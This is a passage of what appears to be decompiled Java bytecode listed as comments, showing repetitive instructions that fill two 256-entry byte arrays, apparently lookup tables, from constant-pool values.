  1801.     //   1088: bipush 107
  1802.     //   1090: ldc_w 344
  1803.     //   1093: bastore
  1804.     //   1094: dup
  1805.     //   1095: bipush 108
  1806.     //   1097: ldc_w 345
  1807.     //   1100: bastore
  1808.     //   1101: dup
  1809.     //   1102: bipush 109
  1810.     //   1104: ldc_w 346
  1811.     //   1107: bastore
  1812.     //   1108: dup
  1813.     //   1109: bipush 110
  1814.     //   1111: ldc_w 347
  1815.     //   1114: bastore
  1816.     //   1115: dup
  1817.     //   1116: bipush 111
  1818.     //   1118: ldc_w 348
  1819.     //   1121: bastore
  1820.     //   1122: dup
  1821.     //   1123: bipush 112
  1822.     //   1125: ldc_w 349
  1823.     //   1128: bastore
  1824.     //   1129: dup
  1825.     //   1130: bipush 113
  1826.     //   1132: ldc_w 308
  1827.     //   1135: bastore
  1828.     //   1136: dup
  1829.     //   1137: bipush 114
  1830.     //   1139: ldc_w 350
  1831.     //   1142: bastore
  1832.     //   1143: dup
  1833.     //   1144: bipush 115
  1834.     //   1146: ldc_w 351
  1835.     //   1149: bastore
  1836.     //   1150: dup
  1837.     //   1151: bipush 116
  1838.     //   1153: ldc_w 330
  1839.     //   1156: bastore
  1840.     //   1157: dup
  1841.     //   1158: bipush 117
  1842.     //   1160: ldc_w 352
  1843.     //   1163: bastore
  1844.     //   1164: dup
  1845.     //   1165: bipush 118
  1846.     //   1167: ldc_w 329
  1847.     //   1170: bastore
  1848.     //   1171: dup
  1849.     //   1172: bipush 119
  1850.     //   1174: ldc_w 295
  1851.     //   1177: bastore
  1852.     //   1178: dup
  1853.     //   1179: bipush 120
  1854.     //   1181: ldc_w 266
  1855.     //   1184: bastore
  1856.     //   1185: dup
  1857.     //   1186: bipush 121
  1858.     //   1188: ldc_w 353
  1859.     //   1191: bastore
  1860.     //   1192: dup
  1861.     //   1193: bipush 122
  1862.     //   1195: ldc_w 294
  1863.     //   1198: bastore
  1864.     //   1199: dup
  1865.     //   1200: bipush 123
  1866.     //   1202: ldc_w 354
  1867.     //   1205: bastore
  1868.     //   1206: dup
  1869.     //   1207: bipush 124
  1870.     //   1209: ldc_w 300
  1871.     //   1212: bastore
  1872.     //   1213: dup
  1873.     //   1214: bipush 125
  1874.     //   1216: ldc_w 324
  1875.     //   1219: bastore
  1876.     //   1220: dup
  1877.     //   1221: bipush 126
  1878.     //   1223: ldc_w 355
  1879.     //   1226: bastore
  1880.     //   1227: dup
  1881.     //   1228: bipush 127
  1882.     //   1230: ldc_w 332
  1883.     //   1233: bastore
  1884.     //   1234: dup
  1885.     //   1235: sipush 128
  1886.     //   1238: ldc_w 356
  1887.     //   1241: bastore
  1888.     //   1242: dup
  1889.     //   1243: sipush 129
  1890.     //   1246: ldc_w 357
  1891.     //   1249: bastore
  1892.     //   1250: dup
  1893.     //   1251: sipush 130
  1894.     //   1254: ldc_w 358
  1895.     //   1257: bastore
  1896.     //   1258: dup
  1897.     //   1259: sipush 131
  1898.     //   1262: ldc_w 302
  1899.     //   1265: bastore
  1900.     //   1266: dup
  1901.     //   1267: sipush 132
  1902.     //   1270: ldc_w 358
  1903.     //   1273: bastore
  1904.     //   1274: dup
  1905.     //   1275: sipush 133
  1906.     //   1278: ldc_w 325
  1907.     //   1281: bastore
  1908.     //   1282: dup
  1909.     //   1283: sipush 134
  1910.     //   1286: ldc_w 274
  1911.     //   1289: bastore
  1912.     //   1290: dup
  1913.     //   1291: sipush 135
  1914.     //   1294: ldc_w 258
  1915.     //   1297: bastore
  1916.     //   1298: dup
  1917.     //   1299: sipush 136
  1918.     //   1302: ldc_w 359
  1919.     //   1305: bastore
  1920.     //   1306: dup
  1921.     //   1307: sipush 137
  1922.     //   1310: ldc_w 288
  1923.     //   1313: bastore
  1924.     //   1314: dup
  1925.     //   1315: sipush 138
  1926.     //   1318: ldc_w 291
  1927.     //   1321: bastore
  1928.     //   1322: dup
  1929.     //   1323: sipush 139
  1930.     //   1326: ldc_w 317
  1931.     //   1329: bastore
  1932.     //   1330: dup
  1933.     //   1331: sipush 140
  1934.     //   1334: ldc_w 360
  1935.     //   1337: bastore
  1936.     //   1338: dup
  1937.     //   1339: sipush 141
  1938.     //   1342: ldc_w 361
  1939.     //   1345: bastore
  1940.     //   1346: dup
  1941.     //   1347: sipush 142
  1942.     //   1350: ldc_w 362
  1943.     //   1353: bastore
  1944.     //   1354: dup
  1945.     //   1355: sipush 143
  1946.     //   1358: ldc_w 363
  1947.     //   1361: bastore
  1948.     //   1362: dup
  1949.     //   1363: sipush 144
  1950.     //   1366: ldc_w 364
  1951.     //   1369: bastore
  1952.     //   1370: dup
  1953.     //   1371: sipush 145
  1954.     //   1374: ldc_w 355
  1955.     //   1377: bastore
  1956.     //   1378: dup
  1957.     //   1379: sipush 146
  1958.     //   1382: ldc_w 284
  1959.     //   1385: bastore
  1960.     //   1386: dup
  1961.     //   1387: sipush 147
  1962.     //   1390: ldc_w 286
  1963.     //   1393: bastore
  1964.     //   1394: dup
  1965.     //   1395: sipush 148
  1966.     //   1398: ldc_w 361
  1967.     //   1401: bastore
  1968.     //   1402: dup
  1969.     //   1403: sipush 149
  1970.     //   1406: ldc_w 365
  1971.     //   1409: bastore
  1972.     //   1410: dup
  1973.     //   1411: sipush 150
  1974.     //   1414: ldc_w 366
  1975.     //   1417: bastore
  1976.     //   1418: dup
  1977.     //   1419: sipush 151
  1978.     //   1422: ldc_w 266
  1979.     //   1425: bastore
  1980.     //   1426: dup
  1981.     //   1427: sipush 152
  1982.     //   1430: ldc_w 352
  1983.     //   1433: bastore
  1984.     //   1434: dup
  1985.     //   1435: sipush 153
  1986.     //   1438: ldc_w 302
  1987.     //   1441: bastore
  1988.     //   1442: dup
  1989.     //   1443: sipush 154
  1990.     //   1446: ldc_w 367
  1991.     //   1449: bastore
  1992.     //   1450: dup
  1993.     //   1451: sipush 155
  1994.     //   1454: ldc_w 349
  1995.     //   1457: bastore
  1996.     //   1458: dup
  1997.     //   1459: sipush 156
  1998.     //   1462: ldc_w 281
  1999.     //   1465: bastore
  2000.     //   1466: dup
  2001.     //   1467: sipush 157
  2002.     //   1470: ldc_w 279
  2003.     //   1473: bastore
  2004.     //   1474: dup
  2005.     //   1475: sipush 158
  2006.     //   1478: ldc_w 368
  2007.     //   1481: bastore
  2008.     //   1482: dup
  2009.     //   1483: sipush 159
  2010.     //   1486: ldc_w 369
  2011.     //   1489: bastore
  2012.     //   1490: dup
  2013.     //   1491: sipush 160
  2014.     //   1494: ldc_w 280
  2015.     //   1497: bastore
  2016.     //   1498: dup
  2017.     //   1499: sipush 161
  2018.     //   1502: ldc_w 272
  2019.     //   1505: bastore
  2020.     //   1506: dup
  2021.     //   1507: sipush 162
  2022.     //   1510: ldc_w 370
  2023.     //   1513: bastore
  2024.     //   1514: dup
  2025.     //   1515: sipush 163
  2026.     //   1518: ldc_w 371
  2027.     //   1521: bastore
  2028.     //   1522: dup
  2029.     //   1523: sipush 164
  2030.     //   1526: ldc_w 372
  2031.     //   1529: bastore
  2032.     //   1530: dup
  2033.     //   1531: sipush 165
  2034.     //   1534: ldc_w 373
  2035.     //   1537: bastore
  2036.     //   1538: dup
  2037.     //   1539: sipush 166
  2038.     //   1542: ldc_w 374
  2039.     //   1545: bastore
  2040.     //   1546: dup
  2041.     //   1547: sipush 167
  2042.     //   1550: ldc_w 294
  2043.     //   1553: bastore
  2044.     //   1554: dup
  2045.     //   1555: sipush 168
  2046.     //   1558: ldc_w 375
  2047.     //   1561: bastore
  2048.     //   1562: dup
  2049.     //   1563: sipush 169
  2050.     //   1566: ldc_w 315
  2051.     //   1569: bastore
  2052.     //   1570: dup
  2053.     //   1571: sipush 170
  2054.     //   1574: ldc_w 376
  2055.     //   1577: bastore
  2056.     //   1578: dup
  2057.     //   1579: sipush 171
  2058.     //   1582: ldc_w 377
  2059.     //   1585: bastore
  2060.     //   1586: dup
  2061.     //   1587: sipush 172
  2062.     //   1590: ldc_w 348
  2063.     //   1593: bastore
  2064.     //   1594: dup
  2065.     //   1595: sipush 173
  2066.     //   1598: ldc_w 275
  2067.     //   1601: bastore
  2068.     //   1602: dup
  2069.     //   1603: sipush 174
  2070.     //   1606: ldc_w 378
  2071.     //   1609: bastore
  2072.     //   1610: dup
  2073.     //   1611: sipush 175
  2074.     //   1614: ldc_w 379
  2075.     //   1617: bastore
  2076.     //   1618: dup
  2077.     //   1619: sipush 176
  2078.     //   1622: ldc_w 375
  2079.     //   1625: bastore
  2080.     //   1626: dup
  2081.     //   1627: sipush 177
  2082.     //   1630: ldc_w 293
  2083.     //   1633: bastore
  2084.     //   1634: dup
  2085.     //   1635: sipush 178
  2086.     //   1638: ldc_w 361
  2087.     //   1641: bastore
  2088.     //   1642: dup
  2089.     //   1643: sipush 179
  2090.     //   1646: ldc_w 380
  2091.     //   1649: bastore
  2092.     //   1650: dup
  2093.     //   1651: sipush 180
  2094.     //   1654: ldc_w 381
  2095.     //   1657: bastore
  2096.     //   1658: dup
  2097.     //   1659: sipush 181
  2098.     //   1662: ldc_w 288
  2099.     //   1665: bastore
  2100.     //   1666: dup
  2101.     //   1667: sipush 182
  2102.     //   1670: ldc_w 285
  2103.     //   1673: bastore
  2104.     //   1674: dup
  2105.     //   1675: sipush 183
  2106.     //   1678: ldc_w 382
  2107.     //   1681: bastore
  2108.     //   1682: dup
  2109.     //   1683: sipush 184
  2110.     //   1686: ldc_w 383
  2111.     //   1689: bastore
  2112.     //   1690: dup
  2113.     //   1691: sipush 185
  2114.     //   1694: ldc_w 256
  2115.     //   1697: bastore
  2116.     //   1698: dup
  2117.     //   1699: sipush 186
  2118.     //   1702: ldc_w 269
  2119.     //   1705: bastore
  2120.     //   1706: dup
  2121.     //   1707: sipush 187
  2122.     //   1710: ldc_w 384
  2123.     //   1713: bastore
  2124.     //   1714: dup
  2125.     //   1715: sipush 188
  2126.     //   1718: ldc_w 385
  2127.     //   1721: bastore
  2128.     //   1722: dup
  2129.     //   1723: sipush 189
  2130.     //   1726: ldc_w 386
  2131.     //   1729: bastore
  2132.     //   1730: dup
  2133.     //   1731: sipush 190
  2134.     //   1734: ldc_w 331
  2135.     //   1737: bastore
  2136.     //   1738: dup
  2137.     //   1739: sipush 191
  2138.     //   1742: ldc_w 387
  2139.     //   1745: bastore
  2140.     //   1746: dup
  2141.     //   1747: sipush 192
  2142.     //   1750: ldc_w 388
  2143.     //   1753: bastore
  2144.     //   1754: dup
  2145.     //   1755: sipush 193
  2146.     //   1758: ldc_w 337
  2147.     //   1761: bastore
  2148.     //   1762: dup
  2149.     //   1763: sipush 194
  2150.     //   1766: ldc_w 389
  2151.     //   1769: bastore
  2152.     //   1770: dup
  2153.     //   1771: sipush 195
  2154.     //   1774: ldc_w 310
  2155.     //   1777: bastore
  2156.     //   1778: dup
  2157.     //   1779: sipush 196
  2158.     //   1782: ldc_w 375
  2159.     //   1785: bastore
  2160.     //   1786: dup
  2161.     //   1787: sipush 197
  2162.     //   1790: ldc_w 270
  2163.     //   1793: bastore
  2164.     //   1794: dup
  2165.     //   1795: sipush 198
  2166.     //   1798: ldc_w 390
  2167.     //   1801: bastore
  2168.     //   1802: dup
  2169.     //   1803: sipush 199
  2170.     //   1806: ldc_w 346
  2171.     //   1809: bastore
  2172.     //   1810: dup
  2173.     //   1811: sipush 200
  2174.     //   1814: ldc_w 391
  2175.     //   1817: bastore
  2176.     //   1818: dup
  2177.     //   1819: sipush 201
  2178.     //   1822: ldc_w 392
  2179.     //   1825: bastore
  2180.     //   1826: dup
  2181.     //   1827: sipush 202
  2182.     //   1830: ldc_w 393
  2183.     //   1833: bastore
  2184.     //   1834: dup
  2185.     //   1835: sipush 203
  2186.     //   1838: ldc_w 383
  2187.     //   1841: bastore
  2188.     //   1842: dup
  2189.     //   1843: sipush 204
  2190.     //   1846: ldc_w 394
  2191.     //   1849: bastore
  2192.     //   1850: dup
  2193.     //   1851: sipush 205
  2194.     //   1854: ldc_w 395
  2195.     //   1857: bastore
  2196.     //   1858: dup
  2197.     //   1859: sipush 206
  2198.     //   1862: ldc_w 396
  2199.     //   1865: bastore
  2200.     //   1866: dup
  2201.     //   1867: sipush 207
  2202.     //   1870: ldc_w 381
  2203.     //   1873: bastore
  2204.     //   1874: dup
  2205.     //   1875: sipush 208
  2206.     //   1878: ldc_w 397
  2207.     //   1881: bastore
  2208.     //   1882: dup
  2209.     //   1883: sipush 209
  2210.     //   1886: ldc_w 398
  2211.     //   1889: bastore
  2212.     //   1890: dup
  2213.     //   1891: sipush 210
  2214.     //   1894: ldc_w 399
  2215.     //   1897: bastore
  2216.     //   1898: dup
  2217.     //   1899: sipush 211
  2218.     //   1902: ldc_w 400
  2219.     //   1905: bastore
  2220.     //   1906: dup
  2221.     //   1907: sipush 212
  2222.     //   1910: ldc_w 401
  2223.     //   1913: bastore
  2224.     //   1914: dup
  2225.     //   1915: sipush 213
  2226.     //   1918: ldc_w 402
  2227.     //   1921: bastore
  2228.     //   1922: dup
  2229.     //   1923: sipush 214
  2230.     //   1926: ldc_w 391
  2231.     //   1929: bastore
  2232.     //   1930: dup
  2233.     //   1931: sipush 215
  2234.     //   1934: ldc_w 306
  2235.     //   1937: bastore
  2236.     //   1938: dup
  2237.     //   1939: sipush 216
  2238.     //   1942: ldc_w 327
  2239.     //   1945: bastore
  2240.     //   1946: dup
  2241.     //   1947: sipush 217
  2242.     //   1950: ldc_w 403
  2243.     //   1953: bastore
  2244.     //   1954: dup
  2245.     //   1955: sipush 218
  2246.     //   1958: ldc_w 404
  2247.     //   1961: bastore
  2248.     //   1962: dup
  2249.     //   1963: sipush 219
  2250.     //   1966: ldc_w 276
  2251.     //   1969: bastore
  2252.     //   1970: dup
  2253.     //   1971: sipush 220
  2254.     //   1974: ldc_w 330
  2255.     //   1977: bastore
  2256.     //   1978: dup
  2257.     //   1979: sipush 221
  2258.     //   1982: ldc_w 392
  2259.     //   1985: bastore
  2260.     //   1986: dup
  2261.     //   1987: sipush 222
  2262.     //   1990: ldc_w 381
  2263.     //   1993: bastore
  2264.     //   1994: dup
  2265.     //   1995: sipush 223
  2266.     //   1998: ldc_w 356
  2267.     //   2001: bastore
  2268.     //   2002: dup
  2269.     //   2003: sipush 224
  2270.     //   2006: ldc_w 405
  2271.     //   2009: bastore
  2272.     //   2010: dup
  2273.     //   2011: sipush 225
  2274.     //   2014: ldc_w 406
  2275.     //   2017: bastore
  2276.     //   2018: dup
  2277.     //   2019: sipush 226
  2278.     //   2022: ldc_w 403
  2279.     //   2025: bastore
  2280.     //   2026: dup
  2281.     //   2027: sipush 227
  2282.     //   2030: ldc_w 362
  2283.     //   2033: bastore
  2284.     //   2034: dup
  2285.     //   2035: sipush 228
  2286.     //   2038: ldc_w 385
  2287.     //   2041: bastore
  2288.     //   2042: dup
  2289.     //   2043: sipush 229
  2290.     //   2046: ldc_w 324
  2291.     //   2049: bastore
  2292.     //   2050: dup
  2293.     //   2051: sipush 230
  2294.     //   2054: ldc_w 323
  2295.     //   2057: bastore
  2296.     //   2058: dup
  2297.     //   2059: sipush 231
  2298.     //   2062: ldc_w 290
  2299.     //   2065: bastore
  2300.     //   2066: dup
  2301.     //   2067: sipush 232
  2302.     //   2070: ldc_w 267
  2303.     //   2073: bastore
  2304.     //   2074: dup
  2305.     //   2075: sipush 233
  2306.     //   2078: ldc_w 407
  2307.     //   2081: bastore
  2308.     //   2082: dup
  2309.     //   2083: sipush 234
  2310.     //   2086: ldc_w 390
  2311.     //   2089: bastore
  2312.     //   2090: dup
  2313.     //   2091: sipush 235
  2314.     //   2094: ldc_w 297
  2315.     //   2097: bastore
  2316.     //   2098: dup
  2317.     //   2099: sipush 236
  2318.     //   2102: ldc_w 400
  2319.     //   2105: bastore
  2320.     //   2106: dup
  2321.     //   2107: sipush 237
  2322.     //   2110: ldc_w 270
  2323.     //   2113: bastore
  2324.     //   2114: dup
  2325.     //   2115: sipush 238
  2326.     //   2118: ldc_w 277
  2327.     //   2121: bastore
  2328.     //   2122: dup
  2329.     //   2123: sipush 239
  2330.     //   2126: ldc_w 373
  2331.     //   2129: bastore
  2332.     //   2130: dup
  2333.     //   2131: sipush 240
  2334.     //   2134: ldc_w 264
  2335.     //   2137: bastore
  2336.     //   2138: dup
  2337.     //   2139: sipush 241
  2338.     //   2142: ldc_w 273
  2339.     //   2145: bastore
  2340.     //   2146: dup
  2341.     //   2147: sipush 242
  2342.     //   2150: ldc_w 408
  2343.     //   2153: bastore
  2344.     //   2154: dup
  2345.     //   2155: sipush 243
  2346.     //   2158: ldc_w 401
  2347.     //   2161: bastore
  2348.     //   2162: dup
  2349.     //   2163: sipush 244
  2350.     //   2166: ldc_w 288
  2351.     //   2169: bastore
  2352.     //   2170: dup
  2353.     //   2171: sipush 245
  2354.     //   2174: ldc_w 409
  2355.     //   2177: bastore
  2356.     //   2178: dup
  2357.     //   2179: sipush 246
  2358.     //   2182: ldc_w 295
  2359.     //   2185: bastore
  2360.     //   2186: dup
  2361.     //   2187: sipush 247
  2362.     //   2190: ldc_w 332
  2363.     //   2193: bastore
  2364.     //   2194: dup
  2365.     //   2195: sipush 248
  2366.     //   2198: ldc_w 335
  2367.     //   2201: bastore
  2368.     //   2202: dup
  2369.     //   2203: sipush 249
  2370.     //   2206: ldc_w 346
  2371.     //   2209: bastore
  2372.     //   2210: dup
  2373.     //   2211: sipush 250
  2374.     //   2214: ldc_w 327
  2375.     //   2217: bastore
  2376.     //   2218: dup
  2377.     //   2219: sipush 251
  2378.     //   2222: ldc_w 290
  2379.     //   2225: bastore
  2380.     //   2226: dup
  2381.     //   2227: sipush 252
  2382.     //   2230: ldc_w 273
  2383.     //   2233: bastore
  2384.     //   2234: dup
  2385.     //   2235: sipush 253
  2386.     //   2238: ldc_w 336
  2387.     //   2241: bastore
  2388.     //   2242: dup
  2389.     //   2243: sipush 254
  2390.     //   2246: ldc_w 338
  2391.     //   2249: bastore
  2392.     //   2250: dup
  2393.     //   2251: sipush 255
  2394.     //   2254: ldc_w 313
  2395.     //   2257: bastore
  2396.     //   2258: astore 11
  2397.     //   2260: sipush 256
  2398.     //   2263: newarray byte
  2399.     //   2265: dup
  2400.     //   2266: iconst_0
  2401.     //   2267: ldc_w 410
  2402.     //   2270: bastore
  2403.     //   2271: dup
  2404.     //   2272: iconst_1
  2405.     //   2273: ldc_w 411
  2406.     //   2276: bastore
  2407.     //   2277: dup
  2408.     //   2278: iconst_2
  2409.     //   2279: ldc_w 377
  2410.     //   2282: bastore
  2411.     //   2283: dup
  2412.     //   2284: iconst_3
  2413.     //   2285: ldc_w 396
  2414.     //   2288: bastore
  2415.     //   2289: dup
  2416.     //   2290: iconst_4
  2417.     //   2291: ldc_w 267
  2418.     //   2294: bastore
  2419.     //   2295: dup
  2420.     //   2296: iconst_5
  2421.     //   2297: ldc_w 412
  2422.     //   2300: bastore
  2423.     //   2301: dup
  2424.     //   2302: bipush 6
  2425.     //   2304: ldc_w 413
  2426.     //   2307: bastore
  2427.     //   2308: dup
  2428.     //   2309: bipush 7
  2429.     //   2311: ldc_w 260
  2430.     //   2314: bastore
  2431.     //   2315: dup
  2432.     //   2316: bipush 8
  2433.     //   2318: ldc_w 414
  2434.     //   2321: bastore
  2435.     //   2322: dup
  2436.     //   2323: bipush 9
  2437.     //   2325: ldc_w 415
  2438.     //   2328: bastore
  2439.     //   2329: dup
  2440.     //   2330: bipush 10
  2441.     //   2332: ldc_w 393
  2442.     //   2335: bastore
  2443.     //   2336: dup
  2444.     //   2337: bipush 11
  2445.     //   2339: ldc_w 416
  2446.     //   2342: bastore
  2447.     //   2343: dup
  2448.     //   2344: bipush 12
  2449.     //   2346: ldc_w 366
  2450.     //   2349: bastore
  2451.     //   2350: dup
  2452.     //   2351: bipush 13
  2453.     //   2353: ldc_w 417
  2454.     //   2356: bastore
  2455.     //   2357: dup
  2456.     //   2358: bipush 14
  2457.     //   2360: ldc_w 418
  2458.     //   2363: bastore
  2459.     //   2364: dup
  2460.     //   2365: bipush 15
  2461.     //   2367: ldc_w 419
  2462.     //   2370: bastore
  2463.     //   2371: dup
  2464.     //   2372: bipush 16
  2465.     //   2374: ldc_w 420
  2466.     //   2377: bastore
  2467.     //   2378: dup
  2468.     //   2379: bipush 17
  2469.     //   2381: ldc_w 421
  2470.     //   2384: bastore
  2471.     //   2385: dup
  2472.     //   2386: bipush 18
  2473.     //   2388: ldc_w 267
  2474.     //   2391: bastore
  2475.     //   2392: dup
  2476.     //   2393: bipush 19
  2477.     //   2395: ldc_w 422
  2478.     //   2398: bastore
  2479.     //   2399: dup
  2480.     //   2400: bipush 20
  2481.     //   2402: ldc_w 300
  2482.     //   2405: bastore
  2483.     //   2406: dup
  2484.     //   2407: bipush 21
  2485.     //   2409: ldc_w 328
  2486.     //   2412: bastore
  2487.     //   2413: dup
  2488.     //   2414: bipush 22
  2489.     //   2416: ldc_w 423
  2490.     //   2419: bastore
  2491.     //   2420: dup
  2492.     //   2421: bipush 23
  2493.     //   2423: ldc_w 399
  2494.     //   2426: bastore
  2495.     //   2427: dup
  2496.     //   2428: bipush 24
  2497.     //   2430: ldc_w 423
  2498.     //   2433: bastore
  2499.     //   2434: dup
  2500.     //   2435: bipush 25
  2501.     //   2437: ldc_w 401
  2502.     //   2440: bastore
  2503.     //   2441: dup
  2504.     //   2442: bipush 26
  2505.     //   2444: ldc_w 409
  2506.     //   2447: bastore
  2507.     //   2448: dup
  2508.     //   2449: bipush 27
  2509.     //   2451: ldc_w 424
  2510.     //   2454: bastore
  2511.     //   2455: dup
  2512.     //   2456: bipush 28
  2513.     //   2458: ldc_w 287
  2514.     //   2461: bastore
  2515.     //   2462: dup
  2516.     //   2463: bipush 29
  2517.     //   2465: ldc_w 392
  2518.     //   2468: bastore
  2519.     //   2469: dup
  2520.     //   2470: bipush 30
  2521.     //   2472: ldc_w 286
  2522.     //   2475: bastore
  2523.     //   2476: dup
  2524.     //   2477: bipush 31
  2525.     //   2479: ldc_w 379
  2526.     //   2482: bastore
  2527.     //   2483: dup
  2528.     //   2484: bipush 32
  2529.     //   2486: ldc_w 324
  2530.     //   2489: bastore
  2531.     //   2490: dup
  2532.     //   2491: bipush 33
  2533.     //   2493: ldc_w 381
  2534.     //   2496: bastore
  2535.     //   2497: dup
  2536.     //   2498: bipush 34
  2537.     //   2500: ldc_w 425
  2538.     //   2503: bastore
  2539.     //   2504: dup
  2540.     //   2505: bipush 35
  2541.     //   2507: ldc_w 426
  2542.     //   2510: bastore
  2543.     //   2511: dup
  2544.     //   2512: bipush 36
  2545.     //   2514: ldc_w 427
  2546.     //   2517: bastore
  2547.     //   2518: dup
  2548.     //   2519: bipush 37
  2549.     //   2521: ldc_w 308
  2550.     //   2524: bastore
  2551.     //   2525: dup
  2552.     //   2526: bipush 38
  2553.     //   2528: ldc_w 350
  2554.     //   2531: bastore
  2555.     //   2532: dup
  2556.     //   2533: bipush 39
  2557.     //   2535: ldc_w 428
  2558.     //   2538: bastore
  2559.     //   2539: dup
  2560.     //   2540: bipush 40
  2561.     //   2542: ldc_w 346
  2562.     //   2545: bastore
  2563.     //   2546: dup
  2564.     //   2547: bipush 41
  2565.     //   2549: ldc_w 429
  2566.     //   2552: bastore
  2567.     //   2553: dup
  2568.     //   2554: bipush 42
  2569.     //   2556: ldc_w 256
  2570.     //   2559: bastore
  2571.     //   2560: dup
  2572.     //   2561: bipush 43
  2573.     //   2563: ldc_w 337
  2574.     //   2566: bastore
  2575.     //   2567: dup
  2576.     //   2568: bipush 44
  2577.     //   2570: ldc_w 430
  2578.     //   2573: bastore
  2579.     //   2574: dup
  2580.     //   2575: bipush 45
  2581.     //   2577: ldc_w 382
  2582.     //   2580: bastore
  2583.     //   2581: dup
  2584.     //   2582: bipush 46
  2585.     //   2584: ldc_w 286
  2586.     //   2587: bastore
  2587.     //   2588: dup
  2588.     //   2589: bipush 47
  2589.     //   2591: ldc_w 431
  2590.     //   2594: bastore
  2591.     //   2595: dup
  2592.     //   2596: bipush 48
  2593.     //   2598: ldc_w 368
  2594.     //   2601: bastore
  2595.     //   2602: dup
  2596.     //   2603: bipush 49
  2597.     //   2605: ldc_w 432
  2598.     //   2608: bastore
  2599.     //   2609: dup
  2600.     //   2610: bipush 50
  2601.     //   2612: ldc_w 314
  2602.     //   2615: bastore
  2603.     //   2616: dup
  2604.     //   2617: bipush 51
  2605.     //   2619: ldc_w 433
  2606.     //   2622: bastore
  2607.     //   2623: dup
  2608.     //   2624: bipush 52
  2609.     //   2626: ldc_w 383
  2610.     //   2629: bastore
  2611.     //   2630: dup
  2612.     //   2631: bipush 53
  2613.     //   2633: ldc_w 434
  2614.     //   2636: bastore
  2615.     //   2637: dup
  2616.     //   2638: bipush 54
  2617.     //   2640: ldc_w 435
  2618.     //   2643: bastore
  2619.     //   2644: dup
  2620.     //   2645: bipush 55
  2621.     //   2647: ldc_w 389
  2622.     //   2650: bastore
  2623.     //   2651: dup
  2624.     //   2652: bipush 56
  2625.     //   2654: ldc_w 436
  2626.     //   2657: bastore
  2627.     //   2658: dup
  2628.     //   2659: bipush 57
  2629.     //   2661: ldc_w 337
  2630.     //   2664: bastore
  2631.     //   2665: dup
  2632.     //   2666: bipush 58
  2633.     //   2668: ldc_w 338
  2634.     //   2671: bastore
  2635.     //   2672: dup
  2636.     //   2673: bipush 59
  2637.     //   2675: ldc_w 299
  2638.     //   2678: bastore
  2639.     //   2679: dup
  2640.     //   2680: bipush 60
  2641.     //   2682: ldc_w 437
  2642.     //   2685: bastore
  2643.     //   2686: dup
  2644.     //   2687: bipush 61
  2645.     //   2689: ldc_w 398
  2646.     //   2692: bastore
  2647.     //   2693: dup
  2648.     //   2694: bipush 62
  2649.     //   2696: ldc_w 318
  2650.     //   2699: bastore
  2651.     //   2700: dup
  2652.     //   2701: bipush 63
  2653.     //   2703: ldc_w 438
  2654.     //   2706: bastore
  2655.     //   2707: dup
  2656.     //   2708: bipush 64
  2657.     //   2710: ldc_w 404
  2658.     //   2713: bastore
  2659.     //   2714: dup
  2660.     //   2715: bipush 65
  2661.     //   2717: ldc_w 371
  2662.     //   2720: bastore
  2663.     //   2721: dup
  2664.     //   2722: bipush 66
  2665.     //   2724: ldc_w 439
  2666.     //   2727: bastore
  2667.     //   2728: dup
  2668.     //   2729: bipush 67
  2669.     //   2731: ldc_w 415
  2670.     //   2734: bastore
  2671.     //   2735: dup
  2672.     //   2736: bipush 68
  2673.     //   2738: ldc_w 382
  2674.     //   2741: bastore
  2675.     //   2742: dup
  2676.     //   2743: bipush 69
  2677.     //   2745: ldc_w 349
  2678.     //   2748: bastore
  2679.     //   2749: dup
  2680.     //   2750: bipush 70
  2681.     //   2752: ldc_w 340
  2682.     //   2755: bastore
  2683.     //   2756: dup
  2684.     //   2757: bipush 71
  2685.     //   2759: ldc_w 310
  2686.     //   2762: bastore
  2687.     //   2763: dup
  2688.     //   2764: bipush 72
  2689.     //   2766: ldc_w 426
  2690.     //   2769: bastore
  2691.     //   2770: dup
  2692.     //   2771: bipush 73
  2693.     //   2773: ldc_w 306
  2694.     //   2776: bastore
  2695.     //   2777: dup
  2696.     //   2778: bipush 74
  2697.     //   2780: ldc_w 373
  2698.     //   2783: bastore
  2699.     //   2784: dup
  2700.     //   2785: bipush 75
  2701.     //   2787: ldc_w 440
  2702.     //   2790: bastore
  2703.     //   2791: dup
  2704.     //   2792: bipush 76
  2705.     //   2794: ldc_w 330
  2706.     //   2797: bastore
  2707.     //   2798: dup
  2708.     //   2799: bipush 77
  2709.     //   2801: ldc_w 337
  2710.     //   2804: bastore
  2711.     //   2805: dup
  2712.     //   2806: bipush 78
  2713.     //   2808: ldc_w 323
  2714.     //   2811: bastore
  2715.     //   2812: dup
  2716.     //   2813: bipush 79
  2717.     //   2815: ldc_w 379
  2718.     //   2818: bastore
  2719.     //   2819: dup
  2720.     //   2820: bipush 80
  2721.     //   2822: ldc_w 279
  2722.     //   2825: bastore
  2723.     //   2826: dup
  2724.     //   2827: bipush 81
  2725.     //   2829: ldc_w 266
  2726.     //   2832: bastore
  2727.     //   2833: dup
  2728.     //   2834: bipush 82
  2729.     //   2836: ldc_w 336
  2730.     //   2839: bastore
  2731.     //   2840: dup
  2732.     //   2841: bipush 83
  2733.     //   2843: ldc_w 400
  2734.     //   2846: bastore
  2735.     //   2847: dup
  2736.     //   2848: bipush 84
  2737.     //   2850: ldc_w 441
  2738.     //   2853: bastore
  2739.     //   2854: dup
  2740.     //   2855: bipush 85
  2741.     //   2857: ldc_w 355
  2742.     //   2860: bastore
  2743.     //   2861: dup
  2744.     //   2862: bipush 86
  2745.     //   2864: ldc_w 335
  2746.     //   2867: bastore
  2747.     //   2868: dup
  2748.     //   2869: bipush 87
  2749.     //   2871: ldc_w 442
  2750.     //   2874: bastore
  2751.     //   2875: dup
  2752.     //   2876: bipush 88
  2753.     //   2878: ldc_w 311
  2754.     //   2881: bastore
  2755.     //   2882: dup
  2756.     //   2883: bipush 89
  2757.     //   2885: ldc_w 354
  2758.     //   2888: bastore
  2759.     //   2889: dup
  2760.     //   2890: bipush 90
  2761.     //   2892: ldc_w 352
  2762.     //   2895: bastore
  2763.     //   2896: dup
  2764.     //   2897: bipush 91
  2765.     //   2899: ldc_w 430
  2766.     //   2902: bastore
  2767.     //   2903: dup
  2768.     //   2904: bipush 92
  2769.     //   2906: ldc_w 283
  2770.     //   2909: bastore
  2771.     //   2910: dup
  2772.     //   2911: bipush 93
  2773.     //   2913: ldc_w 443
  2774.     //   2916: bastore
  2775.     //   2917: dup
  2776.     //   2918: bipush 94
  2777.     //   2920: ldc_w 384
  2778.     //   2923: bastore
  2779.     //   2924: dup
  2780.     //   2925: bipush 95
  2781.     //   2927: ldc_w 287
  2782.     //   2930: bastore
  2783.     //   2931: dup
